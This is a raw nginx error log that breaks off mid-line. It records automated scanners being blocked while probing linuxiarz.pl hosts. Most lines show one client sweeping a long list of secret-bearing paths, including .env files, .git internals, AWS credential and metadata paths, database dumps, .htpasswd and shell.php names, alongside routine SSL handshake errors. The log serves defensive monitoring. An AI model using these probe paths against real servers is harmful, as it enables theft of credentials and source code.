+2025/07/09 17:54:01 [error] 1578488#1578488: *452569 access forbidden by rule, client: 34.168.147.153, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/07/11 19:24:44 [error] 1578487#1578487: *694756 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/07/14 10:45:09 [error] 1578488#1578488: *994614 access forbidden by rule, client: 195.178.110.161, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/07/19 00:23:46 [error] 987465#987465: *441931 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/07/25 21:54:40 [error] 114972#114972: *244540 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/08/02 05:51:25 [error] 114973#114973: *972312 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/08/03 09:55:56 [error] 1250#1250: *32454 access forbidden by rule, client: 216.81.248.34, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/06 04:13:28 [error] 1250#1250: *238634 access forbidden by rule, client: 35.196.180.33, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/08/08 22:08:39 [error] 2670549#2670549: *43825 access forbidden by rule, client: 34.21.93.6, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/08/08 23:08:04 [error] 2670549#2670549: *45836 access forbidden by rule, client: 34.21.93.6, server: kodi.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/08/09 02:10:45 [error] 2670549#2670549: *51267 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/08/12 02:26:30 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.nuxt/dist/server/server.mjs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.output/server/index.mjs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.output/server/chunks/config.mjs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.next/server/pages/api/send.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.vite/manifest.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:31 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.vercel/output/static/index.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.circleci/configs/development.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.AWS_/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/ecs-task-credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:33 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/ecs-task-credentials.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:34 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/metadata HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:35 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/metadata/iam HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:35 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/metadata/iam/security-credentials/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:35 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/s3/keys HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:35 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/s3/secrets HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:35 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws/s3/tokens HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_config.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_creds.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_keys.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_lambda HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_lambda/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_lambda/handler.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:37 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_lambda/secrets.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_lambda/token.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_secrets.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:38 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.aws_secrets.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:40 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:40 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:40 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup.tar HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:40 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup.tar.gz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:42 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:42 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup/db.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:42 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup/mysql.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:43 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.backup/pgsql.dump HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:43 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.circleci/config.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:43 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.cloudfront/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:43 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.cloudfront/keys.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:43 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.cloudfront/secrets.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.config.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.cpanel/caches/config/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.database HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.database.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.database.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:45 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.database.tar.gz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:47 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.db_backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:47 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.db_backup.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:47 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.db_backup.tar HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:48 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.db_backup.tar.gz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:48 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.db_credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:48 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.dockerenv HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:48 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.dump HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:50 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.dump.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:50 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.dump.tar HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:50 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.dump.tar.gz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:50 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:50 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:51 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:51 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:52 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.dev.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:52 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:52 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.local.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:53 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.prod.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:55 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:55 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:55 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:56 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.sendgrid HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:56 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.smtp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:56 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:57 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.staging.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:58 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:59 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/ORIG_HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:59 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:26:59 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:00 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/config.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:00 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/config.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:00 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/config~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:00 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/db.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:02 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/description HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:02 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/dump.sql HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:02 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/execute.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:02 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:02 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:02 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:03 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/index HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:03 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/info/exclude HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:03 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:03 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:03 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:03 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/objects/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:03 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/packed-refs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/heads/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/heads/main HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/heads/master HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:05 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/remotes/origin/main HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/remotes/origin/master HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/stash HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/refs/tags/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.git/shell.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.gitattributes HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.github/workflows/build.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.github/workflows/deploy.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.gitkeep HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:07 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.gitmodules HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:08 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.hg/hgrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:08 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:08 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.htaccess HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.login HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.netrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.npmrc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.pgpass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /.s3/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:27:09 [error] 3135758#3135758: *180599 access forbidden 